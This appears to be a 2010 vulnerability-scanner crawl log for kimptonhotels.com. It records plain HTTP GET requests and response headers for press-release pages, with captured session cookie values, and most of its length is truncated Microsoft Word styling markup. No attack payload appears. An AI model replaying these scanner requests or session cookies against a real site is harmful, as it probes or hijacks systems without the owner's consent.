mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:28848037; mso-list-type:hybrid; mso-list-template-ids:182875624 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.75in; mso-level-number-position:left; margin-left:.75in; text-indent:-.25in; font-family:Symbol;}@list l2:level2 {mso-level-tab-stop:1.25in; mso-level-number-position:left; margin-left:1.25in; text-indent:-.25in;}@list l2:level3 {mso-level-tab-stop:1.75in; mso-level-number-position:left; margin-left:1.75in; text-indent:-.25in;}@list l2:level4 {mso-level-tab-stop:2.25in; mso-level-number-position:left; margin-left:2.25in; text-indent:-.25in;}@list l2:level5 {mso-level-tab-stop:2.75in; mso-level-number-position:left; margin-left:2.75in; text-indent:-.25in;}@list l2:level6 {mso-level-tab-stop:3.25in; mso-level-number-position:left; margin-left:3.25in; text-indent:-.25in;}@list l2:level7 {mso-level-tab-stop:3.75in; mso-level-number-position:left; margin-left:3.75in; text-indent:-.25in;}@list l2:level8 {mso-level-tab-stop:4.25in; mso-level-number-position:left; margin-left:4.25in; text-indent:-.25in;}@list l2:level9 {mso-level-tab-stop:4.75in; mso-level-number-position:left; margin-left:4.75in; text-indent:-.25in;}@list l3 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l4:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l5:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l6:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l6:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:"Courier New";}@list l8 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Arial;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l10:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:lef..
- /pdfs/press/html/Honor-Roll-0810/

/pdfs/press/html/Honor-Roll-0810/

http://www.kimptonhotels.com/pdfs/press/html/Honor-Roll-0810/

Request

GET /pdfs/press/html/Honor-Roll-0810/ HTTP/1.1
Referer: http://www.kimptonhotels.com/pdfs/press/html/Honor-Roll-0810/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 36160
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>3</o:Revision> <o:TotalTime>4</o:TotalTime> <o:LastPrinted>2010-04-23T00:57:00Z</o:LastPrinted> <o:Created>2010-08-09T19:42:00Z</o:Created> <o:LastSaved>2010-08-09T19:42:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>763</o:Words> <o:Characters>4353</o:Characters> <o:Lines>36</o:Lines> <o:Paragraphs>8</o:Paragraphs> <o:CharactersWithSpaces>5345</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Arial-BoldMT; panose-1:0 0 0 0 0 0 0 0 0 0; mso-font-alt:Arial; mso-font-charset:0; mso-generic-font-family:swiss; mso-font-format:other; mso-font-pitch:auto; mso-font-signature:50331648 0 0 0 16777216 0;}@font-face {font-family:ArialMT; panose-1:0 0 0 0 0 0 0 0 0 0; mso-font-alt:Arial; mso-font-charset:0; mso-generic-font-family:swiss; mso-font-format:other; mso-font-pitch:auto; mso-font-signature:50331648 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;}span.1 {mso-style-name:1; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:navy;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1513913928; mso-list-template-ids:-579186908;}@list l10:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l11 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingd..
- /pdfs/press/html/Summer-Playground-0610/index.html

/pdfs/press/html/Summer-Playground-0610/index.html

http://www.kimptonhotels.com/pdfs/press/html/Summer-Playground-0610/index.html

Request

GET /pdfs/press/html/Summer-Playground-0610/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 41913
Content-Type: text/html
Cache-control: private


